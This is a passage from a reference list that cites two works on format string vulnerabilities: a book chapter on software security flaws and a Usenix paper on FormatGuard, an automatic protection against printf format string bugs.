  5. Michael Howard, David LeBlanc and John Viega, 19 deadly sins of software security programming flaws and how to fix them, Chapter 2, 2005 http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20String%20Problems.pdf, [accessed 05-22-2020].
  6. Crispin Cowan , Matt Barringer , Steve Beattie , Greg Kroah-hartman , Mike Frantzen and Jamie Lokier, FormatGuard: Automatic Protection From printf Format String Vulnerabilities, Usenix, 2001 https://www.usenix.org/legacy/events/sec01/full_papers/cowanbarringer/cowanbarringer.pdf [accessed 05-21-2020].